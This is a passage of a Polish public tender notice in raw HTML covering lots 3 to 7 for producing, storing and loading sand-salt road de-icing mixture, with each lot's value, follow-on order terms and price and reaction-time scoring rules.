---------------------------------------------------------- x 80 pkt<br/> cena brutto badanej oferty<br/>1.2 Kryterium – czas reakcji od złożenia dyspozycji (PR).<br/>Kryterium „czas reakcji od złożenia dyspozycji” będzie rozpatrywane na podstawie czasu reakcji, jaką wykonawcy zaproponują w formularzu „Oferta”.<br/>Ocena w zakresie kryterium czasu reakcji od złożenia dyspozycji zostanie dokonana w następujący sposób:<br/>- 20 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie nie dłuższym niż 1 godzina lub do 1 godziny;<br/>- 10 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie do 1,5 godziny lub 1,5 godziny.<br/>Jeżeli w ofercie wykonawca nie zadeklaruje czasu reakcji, poda wartość 0 lub dłuższy niż 1,5 godziny otrzyma 0 punktów w kryterium „czas reakcji <br/>od złożenia dyspozycji”.<br/>1.3 Punkty liczone wg powyższych kryteriów zostaną zsumowane.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy, która w sumie uzyska największą ilość punktów obliczoną wg poniższego wzoru:<br/>PŁ = PC + PR<br/>gdzie: PC – liczba punktów w kryterium „cena” PR – liczba punktów w kryterium „czas reakcji od złożenia dyspozycji” PŁ – liczba punktów łącznie.<br/>1.4 Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. 1.5 Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie wymagania określone <br/>w specyfikacji warunków zamówienia oraz otrzyma największą liczbę punktów spośród rozpatrywanych ofert na realizację przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od złożenia dyspozycji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie, składowanie i załadunek 1500 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Bodzentyn (teren Obwodu Drogowego w Łagowie).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 105000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie, składowanie i załadunek 1500 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Bodzentyn (teren Obwodu Drogowego w Łagowie).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>2. Zamówienie polegające na powtórzeniu podobnych usług (zgodnych <br/>z przedmiotem zamówienia podstawowego), może zostać udzielone dotychczasowemu wykonawcy usługi (tj. Wykonawcy zamówienia podstawowego) w okresie 3 lat od dnia udzielenia zamówienia podstawowego zgodnie z art. 214 ust. 1 pkt 7 ustawy pzp.<br/>3. Zakres przewidywanych zamówień uzupełniających (podobnych usług) wynosi:<br/>- dla zadania Nr 3/ODŁ - 750 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami ocen i ich wagami:<br/>- cena – 80 % = 80 pkt,<br/>- czas reakcji od złożenia dyspozycji - 20% = 20 pkt<br/>Maksymalnie wykonawca może otrzymać 100 punktów (1%=1pkt) oferując najniższą cenę, oraz najkrótszy czas reakcji.<br/>1.1 Kryterium – cena (PC).<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny brutto <br/>za wykonanie przedmiotu zamówienia, podanej przez wykonawcę <br/>na formularzu „Oferta”. Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/> najniższa cena brutto z ocenianych ofert<br/>PC = ---------------------------------------------------------- x 80 pkt<br/> cena brutto badanej oferty<br/>1.2 Kryterium – czas reakcji od złożenia dyspozycji (PR).<br/>Kryterium „czas reakcji od złożenia dyspozycji” będzie rozpatrywane na podstawie czasu reakcji, jaką wykonawcy zaproponują w formularzu „Oferta”.<br/>Ocena w zakresie kryterium czasu reakcji od złożenia dyspozycji zostanie dokonana w następujący sposób:<br/>- 20 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie nie dłuższym niż 1 godzina lub do 1 godziny;<br/>- 10 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie do 1,5 godziny lub 1,5 godziny.<br/>Jeżeli w ofercie wykonawca nie zadeklaruje czasu reakcji, poda wartość 0 lub dłuższy niż 1,5 godziny otrzyma 0 punktów w kryterium „czas reakcji <br/>od złożenia dyspozycji”.<br/>1.3 Punkty liczone wg powyższych kryteriów zostaną zsumowane.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy, która w sumie uzyska największą ilość punktów obliczoną wg poniższego wzoru:<br/>PŁ = PC + PR<br/>gdzie: PC – liczba punktów w kryterium „cena” PR – liczba punktów w kryterium „czas reakcji od złożenia dyspozycji” PŁ – liczba punktów łącznie.<br/>1.4 Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. 1.5 Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie wymagania określone <br/>w specyfikacji warunków zamówienia oraz otrzyma największą liczbę punktów spośród rozpatrywanych ofert na realizację przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od złożenia dyspozycji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie, składowanie i załadunek 1500 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego <br/>w granicach administracyjnych miasta Daleszyce lub w promieniu do 2 km <br/>od ich granic (teren Obwodu Drogowego w Łagowie).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 105000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie, składowanie i załadunek 1500 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego <br/>w granicach administracyjnych miasta Daleszyce lub w promieniu do 2 km <br/>od ich granic (teren Obwodu Drogowego w Łagowie).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>2. Zamówienie polegające na powtórzeniu podobnych usług (zgodnych <br/>z przedmiotem zamówienia podstawowego), może zostać udzielone dotychczasowemu wykonawcy usługi (tj. Wykonawcy<br/>zamówienia podstawowego) w okresie 3 lat od dnia udzielenia zamówienia podstawowego zgodnie z art. 214 ust. 1 pkt 7 ustawy pzp.<br/>3. Zakres przewidywanych zamówień uzupełniających (podobnych usług) wynosi:<br/>- dla zadania Nr 4/ODŁ - 750 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami ocen i ich wagami:<br/>- cena – 80 % = 80 pkt,<br/>- czas reakcji od złożenia dyspozycji - 20% = 20 pkt<br/>Maksymalnie wykonawca może otrzymać 100 punktów (1%=1pkt) oferując najniższą cenę, oraz najkrótszy czas reakcji.<br/>1.1 Kryterium – cena (PC).<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny brutto <br/>za wykonanie przedmiotu zamówienia, podanej przez wykonawcę <br/>na formularzu „Oferta”. Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/> najniższa cena brutto z ocenianych ofert<br/>PC = ---------------------------------------------------------- x 80 pkt<br/> cena brutto badanej oferty<br/>1.2 Kryterium – czas reakcji od złożenia dyspozycji (PR).<br/>Kryterium „czas reakcji od złożenia dyspozycji” będzie rozpatrywane na podstawie czasu reakcji, jaką wykonawcy zaproponują w formularzu „Oferta”.<br/>Ocena w zakresie kryterium czasu reakcji od złożenia dyspozycji zostanie dokonana w następujący sposób:<br/>- 20 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie nie dłuższym niż 1 godzina lub do 1 godziny;<br/>- 10 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie do 1,5 godziny lub 1,5 godziny.<br/>Jeżeli w ofercie wykonawca nie zadeklaruje czasu reakcji, poda wartość 0 lub dłuższy niż 1,5 godziny otrzyma 0 punktów w kryterium „czas reakcji <br/>od złożenia dyspozycji”.<br/>1.3 Punkty liczone wg powyższych kryteriów zostaną zsumowane.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy, która w sumie uzyska największą ilość punktów obliczoną wg poniższego wzoru:<br/>PŁ = PC + PR<br/>gdzie: PC – liczba punktów w kryterium „cena” PR – liczba punktów w kryterium „czas reakcji od złożenia dyspozycji” PŁ – liczba punktów łącznie.<br/>1.4 Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. 1.5 Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie wymagania określone <br/>w specyfikacji warunków zamówienia oraz otrzyma największą liczbę punktów spośród rozpatrywanych ofert na realizację przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od złożenia dyspozycji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie, składowanie i załadunek 750 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Górno w granicach Sołectwa Bęczków (teren Obwodu Drogowego w Łagowie). Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 52500 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie, składowanie i załadunek 750 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Górno w granicach Sołectwa Bęczków (teren Obwodu Drogowego w Łagowie). Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>2. Zamówienie polegające na powtórzeniu podobnych usług (zgodnych <br/>z przedmiotem zamówienia podstawowego), może zostać udzielone dotychczasowemu wykonawcy usługi (tj. Wykonawcy zamówienia podstawowego) w okresie 3 lat od dnia udzielenia zamówienia podstawowego zgodnie z art. 214 ust. 1 pkt 7 ustawy pzp.<br/>3. Zakres przewidywanych zamówień uzupełniających (podobnych usług) wynosi:<br/>- dla zadania Nr 5/ODŁ - 375 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami ocen i ich wagami:<br/>- cena – 80 % = 80 pkt,<br/>- czas reakcji od złożenia dyspozycji - 20% = 20 pkt<br/>Maksymalnie wykonawca może otrzymać 100 punktów (1%=1pkt) oferując najniższą cenę, oraz najkrótszy czas reakcji.<br/>1.1 Kryterium – cena (PC).<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny brutto <br/>za wykonanie przedmiotu zamówienia, podanej przez wykonawcę <br/>na formularzu „Oferta”. Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/> najniższa cena brutto z ocenianych ofert<br/>PC = ---------------------------------------------------------- x 80 pkt<br/> cena brutto badanej oferty<br/>1.2 Kryterium – czas reakcji od złożenia dyspozycji (PR).<br/>Kryterium „czas reakcji od złożenia dyspozycji” będzie rozpatrywane na podstawie czasu reakcji, jaką wykonawcy zaproponują w formularzu „Oferta”.<br/>Ocena w zakresie kryterium czasu reakcji od złożenia dyspozycji zostanie dokonana w następujący sposób:<br/>- 20 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie nie dłuższym niż 1 godzina lub do 1 godziny;<br/>- 10 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie do 1,5 godziny lub 1,5 godziny.<br/>Jeżeli w ofercie wykonawca nie zadeklaruje czasu reakcji, poda wartość 0 lub dłuższy niż 1,5 godziny otrzyma 0 punktów w kryterium „czas reakcji <br/>od złożenia dyspozycji”.<br/>1.3 Punkty liczone wg powyższych kryteriów zostaną zsumowane.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy, która w sumie uzyska największą ilość punktów obliczoną wg poniższego wzoru:<br/>PŁ = PC + PR<br/>gdzie: PC – liczba punktów w kryterium „cena” PR – liczba punktów w kryterium „czas reakcji od złożenia dyspozycji” PŁ – liczba punktów łącznie.<br/>1.4 Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. 1.5 Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie wymagania określone <br/>w specyfikacji warunków zamówienia oraz otrzyma największą liczbę punktów spośród rozpatrywanych ofert na realizację przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od złożenia dyspozycji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie, składowanie i załadunek 1000 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Masłów (teren Obwodu Drogowego w Stachurze).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie, składowanie i załadunek 1000 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego na terenie gminy Masłów (teren Obwodu Drogowego w Stachurze).<br/>Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>2. Zamówienie polegające na powtórzeniu podobnych usług (zgodnych <br/>z przedmiotem zamówienia podstawowego), może zostać udzielone dotychczasowemu wykonawcy usługi (tj. Wykonawcy<br/>zamówienia podstawowego) w okresie 3 lat od dnia udzielenia zamówienia podstawowego zgodnie z art. 214 ust. 1 pkt 7 ustawy pzp.<br/>3. Zakres przewidywanych zamówień uzupełniających (podobnych usług) wynosi:<br/>- dla zadania Nr 6/ODS - 500 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami ocen i ich wagami:<br/>- cena – 80 % = 80 pkt,<br/>- czas reakcji od złożenia dyspozycji - 20% = 20 pkt<br/>Maksymalnie wykonawca może otrzymać 100 punktów (1%=1pkt) oferując najniższą cenę, oraz najkrótszy czas reakcji.<br/>1.1 Kryterium – cena (PC).<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny brutto <br/>za wykonanie przedmiotu zamówienia, podanej przez wykonawcę <br/>na formularzu „Oferta”. Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/> najniższa cena brutto z ocenianych ofert<br/>PC = ---------------------------------------------------------- x 80 pkt<br/> cena brutto badanej oferty<br/>1.2 Kryterium – czas reakcji od złożenia dyspozycji (PR).<br/>Kryterium „czas reakcji od złożenia dyspozycji” będzie rozpatrywane na podstawie czasu reakcji, jaką wykonawcy zaproponują w formularzu „Oferta”.<br/>Ocena w zakresie kryterium czasu reakcji od złożenia dyspozycji zostanie dokonana w następujący sposób:<br/>- 20 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie nie dłuższym niż 1 godzina lub do 1 godziny;<br/>- 10 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie do 1,5 godziny lub 1,5 godziny.<br/>Jeżeli w ofercie wykonawca nie zadeklaruje czasu reakcji, poda wartość 0 lub dłuższy niż 1,5 godziny otrzyma 0 punktów w kryterium „czas reakcji <br/>od złożenia dyspozycji”.<br/>1.3 Punkty liczone wg powyższych kryteriów zostaną zsumowane.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy, która w sumie uzyska największą ilość punktów obliczoną wg poniższego wzoru:<br/>PŁ = PC + PR<br/>gdzie: PC – liczba punktów w kryterium „cena” PR – liczba punktów w kryterium „czas reakcji od złożenia dyspozycji” PŁ – liczba punktów łącznie.<br/>1.4 Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. 1.5 Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie wymagania określone <br/>w specyfikacji warunków zamówienia oraz otrzyma największą liczbę punktów spośród rozpatrywanych ofert na realizację przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od złożenia dyspozycji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie, składowanie i załadunek 1250 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego <br/>w obrębie do 10 km od miejscowości Łosień gm. Piekoszów (teren Obwodu Drogowego w Stachurze). Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 87500 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Wykonanie, składowanie i załadunek 1250 Mg mieszanki piaskowo-solnej przez wykonawcę będącego właścicielem lub dzierżawcą placu położonego <br/>w obrębie do 10 km od miejscowości Łosień gm. Piekoszów (teren Obwodu Drogowego w Stachurze). Mieszanka ma być wykonana z piasku zakupionego przez wykonawcę i soli drogowej dostarczonej przez zamawiającego oraz załadowana ładowarką należącą do wykonawcy na piaskarki zamawiającego. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7<br/>ustawy Pzp.<br/>2. Zamówienie polegające na powtórzeniu podobnych usług (zgodnych z przedmiotem zamówienia<br/>podstawowego), może zostać udzielone dotychczasowemu wykonawcy usługi (tj. Wykonawcy<br/>zamówienia podstawowego) w okresie 3 lat od dnia udzielenia zamówienia podstawowego zgodnie z<br/>art. 214 ust. 1 pkt 7 ustawy pzp.<br/>3. Zakres przewidywanych zamówień uzupełniających (podobnych usług) wynosi:<br/>- dla zadania Nr 7/ODS - 625 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami ocen i ich wagami:<br/>- cena – 80 % = 80 pkt,<br/>- czas reakcji od złożenia dyspozycji - 20% = 20 pkt<br/>Maksymalnie wykonawca może otrzymać 100 punktów (1%=1pkt) oferując najniższą cenę, oraz najkrótszy czas reakcji.<br/>1.1 Kryterium – cena (PC).<br/>Kryterium „cena” będzie rozpatrywane na podstawie ceny brutto <br/>za wykonanie przedmiotu 